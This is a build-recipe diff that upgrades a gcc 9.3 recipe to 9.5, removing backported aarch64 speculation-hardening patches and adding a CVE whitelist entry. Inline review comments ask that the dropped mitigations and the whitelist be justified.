-+if { [check_effective_target_aarch64_asm_sb_ok] } {
-+ set dg-do-what-default assemble
-+} else {
-+ set dg-do-what-default compile
-+}
-+gcc-dg-runtest [lsort [glob -nocomplain $srcdir/$subdir/*.\[cCS\]]] \
-+ "-save-temps" $DEFAULT_CFLAGS
-+set dg-do-what-default ${save-dg-do-what-default}
-+
-+# All done.
-+torture-finish
-+dg-finish
-diff --git a/gcc/testsuite/lib/target-supports.exp b/gcc/testsuite/lib/target-supports.exp
-index ea9a50ccb..79482f9b6 100644
---- a/gcc/testsuite/lib/target-supports.exp
-+++ b/gcc/testsuite/lib/target-supports.exp
-@@ -8579,7 +8579,8 @@ proc check_effective_target_aarch64_tiny { } {
- # Create functions to check that the AArch64 assembler supports the
- # various architecture extensions via the .arch_extension pseudo-op.
-
--foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"} {
-+foreach { aarch64_ext } { "fp" "simd" "crypto" "crc" "lse" "dotprod" "sve"
-+ "sb"} {
- eval [string map [list FUNC $aarch64_ext] {
- proc check_effective_target_aarch64_asm_FUNC_ok { } {
- if { [istarget aarch64*-*-*] } {
---
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch b/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
deleted file mode 100644
index 6dffef0a34..0000000000
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch
+++ /dev/null
@@ -1,659 +0,0 @@
-CVE: CVE-2020-13844
-Upstream-Status: Backport
-Signed-off-by: Ross Burton <ross.burton@arm.com>
-
-From 2155170525f93093b90a1a065e7ed71a925566e9 Mon Sep 17 00:00:00 2001
-From: Matthew Malcomson <matthew.malcomson@arm.com>
-Date: Thu, 9 Jul 2020 09:11:59 +0100
-Subject: [PATCH 3/3] aarch64: Mitigate SLS for BLR instruction
-
-This patch introduces the mitigation for Straight Line Speculation past
-the BLR instruction.
-
-This mitigation replaces BLR instructions with a BL to a stub which uses
-a BR to jump to the original value. These function stubs are then
-appended with a speculation barrier to ensure no straight line
-speculation happens after these jumps.
-
-When optimising for speed we use a set of stubs for each function since
-this should help the branch predictor make more accurate predictions
-about where a stub should branch.
-
-When optimising for size we use one set of stubs for all functions.
-This set of stubs can have human readable names, and we are using
-`__call_indirect_x<N>` for register x<N>.
-
-When BTI branch protection is enabled the BLR instruction can jump to a
-`BTI c` instruction using any register, while the BR instruction can
-only jump to a `BTI c` instruction using the x16 or x17 registers.
-Hence, in order to ensure this transformation is safe we mov the value
-of the original register into x16 and use x16 for the BR.
-
-As an example when optimising for size:
-a
- BLR x0
-instruction would get transformed to something like
- BL __call_indirect_x0
-where __call_indirect_x0 labels a thunk that contains
-__call_indirect_x0:
- MOV X16, X0
- BR X16
- <speculation barrier>
-
-The first version of this patch used local symbols specific to a
-compilation unit to try and avoid relocations.
-This was mistaken since functions coming from the same compilation unit
-can still be in different sections, and the assembler will insert
-relocations at jumps between sections.
-
-On any relocation the linker is permitted to emit a veneer to handle
-jumps between symbols that are very far apart. The registers x16 and
-x17 may be clobbered by these veneers.
-Hence the function stubs cannot rely on the values of x16 and x17 being
-the same as just before the function stub is called.
-
-Similar can be said for the hot/cold partitioning of single functions,
-so function-local stubs have the same restriction.
-
-This updated version of the patch never emits function stubs for x16 and
-x17, and instead forces other registers to be used.
-
-Given the above, there is now no benefit to local symbols (since they
-are not enough to avoid dealing with linker intricacies). This patch
-now uses global symbols with hidden visibility each stored in their own
-COMDAT section. This means stubs can be shared between compilation
-units while still avoiding the PLT indirection.
-
-This patch also removes the `__call_indirect_x30` stub (and
-function-local equivalent) which would simply jump back to the original
-location.
-
-The function-local stubs are emitted to the assembly output file in one
-chunk, which means we need not add the speculation barrier directly
-after each one.
-This is because we know for certain that the instructions directly after
-the BR in all but the last function stub will be from another one of
-these stubs and hence will not contain a speculation gadget.
-Instead we add a speculation barrier at the end of the sequence of
-stubs.
-
-The global stubs are emitted in COMDAT/.linkonce sections by
-themselves so that the linker can remove duplicates from multiple object
-files. This means they are not emitted in one chunk, and each one must
-include the speculation barrier.
-
-Another difference is that since the global stubs are shared across
-compilation units we do not know that all functions will be targeting an
-architecture supporting the SB instruction.
-Rather than provide multiple stubs for each architecture, we provide a
-stub that will work for all architectures -- using the DSB+ISB barrier.
-
-This mitigation does not apply for BLR instructions in the following
-places:
-- Some accesses to thread-local variables use a code sequence with a BLR
- instruction. This code sequence is part of the binary interface between
- compiler and linker. If this BLR instruction needs to be mitigated, it'd
- probably be best to do so in the linker. It seems that the code sequence
- for thread-local variable access is unlikely to lead to a Spectre Revalation
- Gadget.
-- PLT stubs are produced by the linker and each contain a BLR instruction.
- It seems that at most only after the last PLT stub a Spectre Revalation
- Gadget might appear.
-
-Testing:
- Bootstrap and regtest on AArch64
- (with BOOT_CFLAGS="-mharden-sls=retbr,blr")
- Used a temporary hack(1) in gcc-dg.exp to use these options on every
- test in the testsuite, a slight modification to emit the speculation
- barrier after every function stub, and a script to check that the
- output never emitted a BLR, or unmitigated BR or RET instruction.
- Similar on an aarch64-none-elf cross-compiler.
-
-1) Temporary hack emitted a speculation barrier at the end of every stub
-function, and used a script to ensure that:
- a) Every RET or BR is immediately followed by a speculation barrier.
- b) No BLR instruction is emitted by compiler.
-
-(cherry picked from 96b7f495f9269d5448822e4fc28882edb35a58d7)
-
-gcc/ChangeLog:
-
- * config/aarch64/aarch64-protos.h (aarch64_indirect_call_asm):
- New declaration.
- * config/aarch64/aarch64.c (aarch64_regno_regclass): Handle new
- stub registers class.
- (aarch64_class_max_nregs): Likewise.
- (aarch64_register_move_cost): Likewise.
- (aarch64_sls_shared_thunks): Global array to store stub labels.
- (aarch64_sls_emit_function_stub): New.
- (aarch64_create_blr_label): New.
- (aarch64_sls_emit_blr_function_thunks): New.
- (aarch64_sls_emit_shared_blr_thunks): New.
- (aarch64_asm_file_end): New.
- (aarch64_indirect_call_asm): New.
- (TARGET_ASM_FILE_END): Use aarch64_asm_file_end.
- (TARGET_ASM_FUNCTION_EPILOGUE): Use
- aarch64_sls_emit_blr_function_thunks.
- * config/aarch64/aarch64.h (STB_REGNUM_P): New.
- (enum reg_class): Add STUB_REGS class.
- (machine_function): Introduce `call_via` array for
- function-local stub labels.
- * config/aarch64/aarch64.md (*call_insn, *call_value_insn): Use
- aarch64_indirect_call_asm to emit code when hardening BLR
- instructions.
- * config/aarch64/constraints.md (Ucr): New constraint
- representing registers for indirect calls. Is GENERAL_REGS
- usually, and STUB_REGS when hardening BLR instruction against
- SLS.
- * config/aarch64/predicates.md (aarch64_general_reg): STUB_REGS class
- is also a general register.
-
-gcc/testsuite/ChangeLog:
-
- * gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c: New test.
- * gcc.target/aarch64/sls-mitigation/sls-miti-blr.c: New test.
----
- gcc/config/aarch64/aarch64-protos.h | 1 +
- gcc/config/aarch64/aarch64.c | 225 +++++++++++++++++-
- gcc/config/aarch64/aarch64.h | 15 ++
- gcc/config/aarch64/aarch64.md | 11 +-
- gcc/config/aarch64/constraints.md | 9 +
- gcc/config/aarch64/predicates.md | 3 +-
- .../aarch64/sls-mitigation/sls-miti-blr-bti.c | 40 ++++
- .../aarch64/sls-mitigation/sls-miti-blr.c | 33 +++
- 8 files changed, 328 insertions(+), 9 deletions(-)
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
- create mode 100644 gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-
-diff --git a/gcc/config/aarch64/aarch64-protos.h b/gcc/config/aarch64/aarch64-protos.h
-index 885eae893..2676e43ae 100644
---- a/gcc/config/aarch64/aarch64-protos.h
-+++ b/gcc/config/aarch64/aarch64-protos.h
-@@ -645,6 +645,7 @@ poly_uint64 aarch64_regmode_natural_size (machine_mode);
- bool aarch64_high_bits_all_ones_p (HOST_WIDE_INT);
-
- const char *aarch64_sls_barrier (int);
-+const char *aarch64_indirect_call_asm (rtx);
- extern bool aarch64_harden_sls_retbr_p (void);
- extern bool aarch64_harden_sls_blr_p (void);
-
-diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
-index dff61105c..bc6c02c3a 100644
---- a/gcc/config/aarch64/aarch64.c
-+++ b/gcc/config/aarch64/aarch64.c
-@@ -8190,6 +8190,9 @@ aarch64_label_mentioned_p (rtx x)
- enum reg_class
- aarch64_regno_regclass (unsigned regno)
- {
-+ if (STUB_REGNUM_P (regno))
-+ return STUB_REGS;
-+
- if (GP_REGNUM_P (regno))
- return GENERAL_REGS;
-
-@@ -8499,6 +8502,7 @@ aarch64_class_max_nregs (reg_class_t regclass, machine_mode mode)
- unsigned int nregs;
- switch (regclass)
- {
-+ case STUB_REGS:
- case TAILCALL_ADDR_REGS:
- case POINTER_REGS:
- case GENERAL_REGS:
-@@ -10693,10 +10697,12 @@ aarch64_register_move_cost (machine_mode mode,
- = aarch64_tune_params.regmove_cost;
-
- /* Caller save and pointer regs are equivalent to GENERAL_REGS. */
-- if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS)
-+ if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS
-+ || to == STUB_REGS)
- to = GENERAL_REGS;
-
-- if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS)
-+ if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS
-+ || from == STUB_REGS)
- from = GENERAL_REGS;
-
- /* Moving between GPR and stack cost is the same as GP2GP. */
-@@ -19009,6 +19015,215 @@ aarch64_sls_barrier (int mitigation_required)
- : "";
- }
-
-+static GTY (()) tree aarch64_sls_shared_thunks[30];
-+static GTY (()) bool aarch64_sls_shared_thunks_needed = false;
-+const char *indirect_symbol_names[30] = {
-+ "__call_indirect_x0",
-+ "__call_indirect_x1",
-+ "__call_indirect_x2",
-+ "__call_indirect_x3",
-+ "__call_indirect_x4",
-+ "__call_indirect_x5",
-+ "__call_indirect_x6",
-+ "__call_indirect_x7",
-+ "__call_indirect_x8",
-+ "__call_indirect_x9",
-+ "__call_indirect_x10",
-+ "__call_indirect_x11",
-+ "__call_indirect_x12",
-+ "__call_indirect_x13",
-+ "__call_indirect_x14",
-+ "__call_indirect_x15",
-+ "", /* "__call_indirect_x16", */
-+ "", /* "__call_indirect_x17", */
-+ "__call_indirect_x18",
-+ "__call_indirect_x19",
-+ "__call_indirect_x20",
-+ "__call_indirect_x21",
-+ "__call_indirect_x22",
-+ "__call_indirect_x23",
-+ "__call_indirect_x24",
-+ "__call_indirect_x25",
-+ "__call_indirect_x26",
-+ "__call_indirect_x27",
-+ "__call_indirect_x28",
-+ "__call_indirect_x29",
-+};
-+
-+/* Function to create a BLR thunk. This thunk is used to mitigate straight
-+ line speculation. Instead of a simple BLR that can be speculated past,
-+ we emit a BL to this thunk, and this thunk contains a BR to the relevant
-+ register. These thunks have the relevant speculation barries put after
-+ their indirect branch so that speculation is blocked.
-+
-+ We use such a thunk so the speculation barriers are kept off the
-+ architecturally executed path in order to reduce the performance overhead.
-+
-+ When optimizing for size we use stubs shared by the linked object.
-+ When optimizing for performance we emit stubs for each function in the hope
-+ that the branch predictor can better train on jumps specific for a given
-+ function. */
-+rtx
-+aarch64_sls_create_blr_label (int regnum)
-+{
-+ gcc_assert (STUB_REGNUM_P (regnum));
-+ if (optimize_function_for_size_p (cfun))
-+ {
-+ /* For the thunks shared between different functions in this compilation
-+ unit we use a named symbol -- this is just for users to more easily
-+ understand the generated assembly. */
-+ aarch64_sls_shared_thunks_needed = true;
-+ const char *thunk_name = indirect_symbol_names[regnum];
-+ if (aarch64_sls_shared_thunks[regnum] == NULL)
-+ {
-+ /* Build a decl representing this function stub and record it for
-+ later. We build a decl here so we can use the GCC machinery for
-+ handling sections automatically (through `get_named_section` and
-+ `make_decl_one_only`). That saves us a lot of trouble handling
-+ the specifics of different output file formats. */
-+ tree decl = build_decl (BUILTINS_LOCATION, FUNCTION_DECL,
-+ get_identifier (thunk_name),
-+ build_function_type_list (void_type_node,
-+ NULL_TREE));
-+ DECL_RESULT (decl) = build_decl (BUILTINS_LOCATION, RESULT_DECL,
-+ NULL_TREE, void_type_node);
-+ TREE_PUBLIC (decl) = 1;
-+ TREE_STATIC (decl) = 1;
-+ DECL_IGNORED_P (decl) = 1;
-+ DECL_ARTIFICIAL (decl) = 1;
-+ make_decl_one_only (decl, DECL_ASSEMBLER_NAME (decl));
-+ resolve_unique_section (decl, 0, false);
-+ aarch64_sls_shared_thunks[regnum] = decl;
-+ }
-+
-+ return gen_rtx_SYMBOL_REF (Pmode, thunk_name);
-+ }
-+
-+ if (cfun->machine->call_via[regnum] == NULL)
-+ cfun->machine->call_via[regnum]
-+ = gen_rtx_LABEL_REF (Pmode, gen_label_rtx ());
-+ return cfun->machine->call_via[regnum];
-+}
-+
-+/* Helper function for aarch64_sls_emit_blr_function_thunks and
-+ aarch64_sls_emit_shared_blr_thunks below. */
-+static void
-+aarch64_sls_emit_function_stub (FILE *out_file, int regnum)
-+{
-+ /* Save in x16 and branch to that function so this transformation does
-+ not prevent jumping to `BTI c` instructions. */
-+ asm_fprintf (out_file, "\tmov\tx16, x%d\n", regnum);
-+ asm_fprintf (out_file, "\tbr\tx16\n");
-+}
-+
-+/* Emit all BLR stubs for this particular function.
-+ Here we emit all the BLR stubs needed for the current function. Since we
-+ emit these stubs in a consecutive block we know there will be no speculation
-+ gadgets between each stub, and hence we only emit a speculation barrier at
-+ the end of the stub sequences.
-+
-+ This is called in the TARGET_ASM_FUNCTION_EPILOGUE hook. */
-+void
-+aarch64_sls_emit_blr_function_thunks (FILE *out_file)
-+{
-+ if (! aarch64_harden_sls_blr_p ())
-+ return;
-+
-+ bool any_functions_emitted = false;
-+ /* We must save and restore the current function section since this assembly
-+ is emitted at the end of the function. This means it can be emitted *just
-+ after* the cold section of a function. That cold part would be emitted in
-+ a different section. That switch would trigger a `.cfi_endproc` directive
-+ to be emitted in the original section and a `.cfi_startproc` directive to
-+ be emitted in the new section. Switching to the original section without
-+ restoring would mean that the `.cfi_endproc` emitted as a function ends
-+ would happen in a different section -- leaving an unmatched
-+ `.cfi_startproc` in the cold text section and an unmatched `.cfi_endproc`
-+ in the standard text section. */
-+ section *save_text_section = in_section;
-+ switch_to_section (function_section (current_function_decl));
-+ for (int regnum = 0; regnum < 30; ++regnum)
-+ {
-+ rtx specu_label = cfun->machine->call_via[regnum];
-+ if (specu_label == NULL)
-+ continue;
-+
-+ targetm.asm_out.print_operand (out_file, specu_label, 0);
-+ asm_fprintf (out_file, ":\n");
-+ aarch64_sls_emit_function_stub (out_file, regnum);
-+ any_functions_emitted = true;
-+ }
-+ if (any_functions_emitted)
-+ /* Can use the SB if needs be here, since this stub will only be used
-+ by the current function, and hence for the current target. */
-+ asm_fprintf (out_file, "\t%s\n", aarch64_sls_barrier (true));
-+ switch_to_section (save_text_section);
-+}
-+
-+/* Emit shared BLR stubs for the current compilation unit.
-+ Over the course of compiling this unit we may have converted some BLR
-+ instructions to a BL to a shared stub function. This is where we emit those
-+ stub functions.
-+ This function is for the stubs shared between different functions in this
-+ compilation unit. We share when optimizing for size instead of speed.
-+
-+ This function is called through the TARGET_ASM_FILE_END hook. */
-+void
-+aarch64_sls_emit_shared_blr_thunks (FILE *out_file)
-+{
-+ if (! aarch64_sls_shared_thunks_needed)
-+ return;
-+
-+ for (int regnum = 0; regnum < 30; ++regnum)
-+ {
-+ tree decl = aarch64_sls_shared_thunks[regnum];
-+ if (!decl)
-+ continue;
-+
-+ const char *name = indirect_symbol_names[regnum];
-+ switch_to_section (get_named_section (decl, NULL, 0));
-+ ASM_OUTPUT_ALIGN (out_file, 2);
-+ targetm.asm_out.globalize_label (out_file, name);
-+ /* Only emits if the compiler is configured for an assembler that can
-+ handle visibility directives. */
-+ targetm.asm_out.assemble_visibility (decl, VISIBILITY_HIDDEN);
-+ ASM_OUTPUT_TYPE_DIRECTIVE (out_file, name, "function");
-+ ASM_OUTPUT_LABEL (out_file, name);
-+ aarch64_sls_emit_function_stub (out_file, regnum);
-+ /* Use the most conservative target to ensure it can always be used by any
-+ function in the translation unit. */
-+ asm_fprintf (out_file, "\tdsb\tsy\n\tisb\n");
-+ ASM_DECLARE_FUNCTION_SIZE (out_file, name, decl);
-+ }
-+}
-+
-+/* Implement TARGET_ASM_FILE_END. */
-+void
-+aarch64_asm_file_end ()
-+{
-+ aarch64_sls_emit_shared_blr_thunks (asm_out_file);
-+ /* Since this function will be called for the ASM_FILE_END hook, we ensure
-+ that what would be called otherwise (e.g. `file_end_indicate_exec_stack`
-+ for FreeBSD) still gets called. */
-+#ifdef TARGET_ASM_FILE_END
-+ TARGET_ASM_FILE_END ();
-+#endif
-+}
-+
-+const char *
-+aarch64_indirect_call_asm (rtx addr)
-+{
-+ gcc_assert (REG_P (addr));
-+ if (aarch64_harden_sls_blr_p ())
-+ {
-+ rtx stub_label = aarch64_sls_create_blr_label (REGNO (addr));
-+ output_asm_insn ("bl\t%0", &stub_label);
-+ }
-+ else
-+ output_asm_insn ("blr\t%0", &addr);
-+ return "";
-+}
-+
- /* Target-specific selftests. */
-
- #if CHECKING_P
-@@ -19529,6 +19744,12 @@ aarch64_libgcc_floating_mode_supported_p
- #define TARGET_RUN_TARGET_SELFTESTS selftest::aarch64_run_selftests
- #endif /* #if CHECKING_P */
-
-+#undef TARGET_ASM_FILE_END
-+#define TARGET_ASM_FILE_END aarch64_asm_file_end
-+
-+#undef TARGET_ASM_FUNCTION_EPILOGUE
-+#define TARGET_ASM_FUNCTION_EPILOGUE aarch64_sls_emit_blr_function_thunks
-+
- struct gcc_target targetm = TARGET_INITIALIZER;
-
- #include "gt-aarch64.h"
-diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
-index 72ddc6fd9..60682a100 100644
---- a/gcc/config/aarch64/aarch64.h
-+++ b/gcc/config/aarch64/aarch64.h
-@@ -540,6 +540,16 @@ extern unsigned aarch64_architecture_version;
- #define GP_REGNUM_P(REGNO) \
- (((unsigned) (REGNO - R0_REGNUM)) <= (R30_REGNUM - R0_REGNUM))
-
-+/* Registers known to be preserved over a BL instruction. This consists of the
-+ GENERAL_REGS without x16, x17, and x30. The x30 register is changed by the
-+ BL instruction itself, while the x16 and x17 registers may be used by
-+ veneers which can be inserted by the linker. */
-+#define STUB_REGNUM_P(REGNO) \
-+ (GP_REGNUM_P (REGNO) \
-+ && (REGNO) != R16_REGNUM \
-+ && (REGNO) != R17_REGNUM \
-+ && (REGNO) != R30_REGNUM) \
-+
- #define FP_REGNUM_P(REGNO) \
- (((unsigned) (REGNO - V0_REGNUM)) <= (V31_REGNUM - V0_REGNUM))
-
-@@ -561,6 +571,7 @@ enum reg_class
- {
- NO_REGS,
- TAILCALL_ADDR_REGS,
-+ STUB_REGS,
- GENERAL_REGS,
- STACK_REG,
- POINTER_REGS,
-@@ -580,6 +591,7 @@ enum reg_class
- { \
- "NO_REGS", \
- "TAILCALL_ADDR_REGS", \
-+ "STUB_REGS", \
- "GENERAL_REGS", \
- "STACK_REG", \
- "POINTER_REGS", \
-@@ -596,6 +608,7 @@ enum reg_class
- { \
- { 0x00000000, 0x00000000, 0x00000000 }, /* NO_REGS */ \
- { 0x00030000, 0x00000000, 0x00000000 }, /* TAILCALL_ADDR_REGS */\
-+ { 0x3ffcffff, 0x00000000, 0x00000000 }, /* STUB_REGS */ \
- { 0x7fffffff, 0x00000000, 0x00000003 }, /* GENERAL_REGS */ \
- { 0x80000000, 0x00000000, 0x00000000 }, /* STACK_REG */ \
- { 0xffffffff, 0x00000000, 0x00000003 }, /* POINTER_REGS */ \
-@@ -735,6 +748,8 @@ typedef struct GTY (()) machine_function
- struct aarch64_frame frame;
- /* One entry for each hard register. */
- bool reg_is_wrapped_separately[LAST_SAVED_REGNUM];
-+ /* One entry for each general purpose register. */
-+ rtx call_via[SP_REGNUM];
- bool label_is_assembled;
- } machine_function;
- #endif
-diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
-index 494aee964..ed8cf8ece 100644
---- a/gcc/config/aarch64/aarch64.md
-+++ b/gcc/config/aarch64/aarch64.md
-@@ -908,15 +908,14 @@
- )
-
- (define_insn "*call_insn"
-- [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "r, Usf"))
-+ [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "Ucr, Usf"))
- (match_operand 1 "" ""))
- (clobber (reg:DI LR_REGNUM))]
- ""
- "@
-- blr\\t%0
-+ * return aarch64_indirect_call_asm (operands[0]);
- bl\\t%c0"
-- [(set_attr "type" "call, call")]
--)
-+ [(set_attr "type" "call, call")])
-
- (define_expand "call_value"
- [(parallel [(set (match_operand 0 "" "")
-@@ -934,12 +933,12 @@
-
- (define_insn "*call_value_insn"
- [(set (match_operand 0 "" "")
-- (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "r, Usf"))
-+ (call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "Ucr, Usf"))
- (match_operand 2 "" "")))
- (clobber (reg:DI LR_REGNUM))]
- ""
- "@
-- blr\\t%1
-+ * return aarch64_indirect_call_asm (operands[1]);
- bl\\t%c1"
- [(set_attr "type" "call, call")]
- )
-diff --git a/gcc/config/aarch64/constraints.md b/gcc/config/aarch64/constraints.md
-index 21f9549e6..7756dbe83 100644
---- a/gcc/config/aarch64/constraints.md
-+++ b/gcc/config/aarch64/constraints.md
-@@ -24,6 +24,15 @@
- (define_register_constraint "Ucs" "TAILCALL_ADDR_REGS"
- "@internal Registers suitable for an indirect tail call")
-
-+(define_register_constraint "Ucr"
-+ "aarch64_harden_sls_blr_p () ? STUB_REGS : GENERAL_REGS"
-+ "@internal Registers to be used for an indirect call.
-+ This is usually the general registers, but when we are hardening against
-+ Straight Line Speculation we disallow x16, x17, and x30 so we can use
-+ indirection stubs. These indirection stubs cannot use the above registers
-+ since they will be reached by a BL that may have to go through a linker
-+ veneer.")
-+
- (define_register_constraint "w" "FP_REGS"
- "Floating point and SIMD vector registers.")
-
-diff --git a/gcc/config/aarch64/predicates.md b/gcc/config/aarch64/predicates.md
-index 8e1b78421..4250aecb3 100644
---- a/gcc/config/aarch64/predicates.md
-+++ b/gcc/config/aarch64/predicates.md
-@@ -32,7 +32,8 @@
-
- (define_predicate "aarch64_general_reg"
- (and (match_operand 0 "register_operand")
-- (match_test "REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
-+ (match_test "REGNO_REG_CLASS (REGNO (op)) == STUB_REGS
-+ || REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
-
- ;; Return true if OP a (const_int 0) operand.
- (define_predicate "const0_operand"
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-new file mode 100644
-index 000000000..b1fb754c7
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-@@ -0,0 +1,40 @@
-+/* { dg-do compile } */
-+/* { dg-additional-options "-mharden-sls=blr -mbranch-protection=bti" } */
-+/*
-+ Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+ Here we also check that there are no BR instructions with anything except an
-+ x16 or x17 register. This is because a `BTI c` instruction can be branched
-+ to using a BLR instruction using any register, but can only be branched to
-+ with a BR using an x16 or x17 register.
-+ */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+ does not. */
-+int blr_call_value (struct sls_testclass x)
-+{
-+ int retval = x.x(x.left, x.right);
-+ if (retval % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+ if (x.left % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler-not {\tbr\tx(?!16|17)} } } */
-+/* { dg-final { scan-assembler {\tbr\tx(16|17)} } } */
-+
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-new file mode 100644
-index 000000000..88baffffe
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-@@ -0,0 +1,33 @@
-+/* { dg-additional-options "-mharden-sls=blr -save-temps" } */
-+/* Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+ We only test that all BLR instructions have been removed, not that the
-+ resulting code makes sense. */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+ foo *x;
-+ bar *y;
-+ int left;
-+ int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+ does not. */
-+int blr_call_value (struct sls_testclass x)
-+{
-+ int retval = x.x(x.left, x.right);
-+ if (retval % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+ x.y(x.left, x.right);
-+ if (x.left % 10)
-+ return 100;
-+ return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler {\tbr\tx[0-9][0-9]?} } } */
---
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3.inc b/meta/recipes-devtools/gcc/gcc-9.5.inc
index 4c54ba250a..9bb41bbe24 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3.inc
+++ b/meta/recipes-devtools/gcc/gcc-9.5.inc
@@ -2,13 +2,13 @@ require gcc-common.inc
# Third digit in PV should be incremented after a minor release
-PV = "9.3.0"
+PV = "9.5.0"
# BINV should be incremented to a revision after a minor gcc release
-BINV = "9.3.0"
+BINV = "9.5.0"
-FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.3:${FILE_DIRNAME}/gcc-9.3/backport:"
+FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.5:${FILE_DIRNAME}/gcc-9.5/backport:"
DEPENDS =+ "mpfr gmp libmpc zlib flex-native"
NATIVEDEPS = "mpfr-native gmp-native libmpc-native zlib-native flex-native"
@@ -69,15 +69,14 @@ SRC_URI = "\
file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \
file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \
file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \
- file://0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch \
- file://0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch \
- file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \
+ file://0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch \
+ file://CVE-2023-4039.patch \
"
S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
-SRC_URI[sha256sum] = "71e197867611f6054aa1119b13a0c0abac12834765fe2d81f35ac57f84f742d1"
+SRC_URI[sha256sum] = "27769f64ef1d4cd5e2be8682c0c93f9887983e6cfd1a927ce5a0a2915a95cf8f"
# For dev release snapshotting
#S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/official-gcc-${RELEASE}"
-#B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
# Language Overrides
FORTRAN = ""
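Review bot: The SRC_URI change drops the three aarch64 SLS backports (`0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch`, `0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch`, `0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch`) without recording why. The deleted 0003 patch carried a `CVE: CVE-2020-13844` header, which cve-check reads as evidence that the issue is patched. Presumably 9.5.0 already contains these changes upstream; that should be confirmed, along with a cve-check run showing CVE-2020-13844 is not reported as unpatched for the new version. Once confirmed, a line near SRC_URI such as `# SLS mitigation backports (CVE-2020-13844) dropped: included upstream in 9.5.0` would keep the audit trail in the recipe. Separately, `B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"` is now active while still sitting under `# For dev release snapshotting`; if that is intentional, move it above that comment so it does not read as a leftover.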
@@ -122,3 +121,6 @@ EXTRA_OECONF_PATHS = "\
--with-sysroot=/not/exist \
--with-build-sysroot=${STAGING_DIR_TARGET} \
"
+
+# Is a binutils 2.26 issue, not gcc
+CVE_CHECK_WHITELIST += "CVE-2021-37322"
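Review bot: The whitelist entry for `CVE-2021-37322` is justified only by `# Is a binutils 2.26 issue, not gcc`, which does not say how that was established or where a reader can verify it. This .inc is presumably included by every gcc 9.5 recipe variant, so the suppression would apply to all of them and the comment is the only audit trail for it. I would expand it to something like `# CVE-2021-37322 is reported against binutils 2.26, not gcc; see <advisory or tracker URL> for the analysis`, with the placeholder replaced by the actual reference.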
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
index 0d9222df17..0d9222df17 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
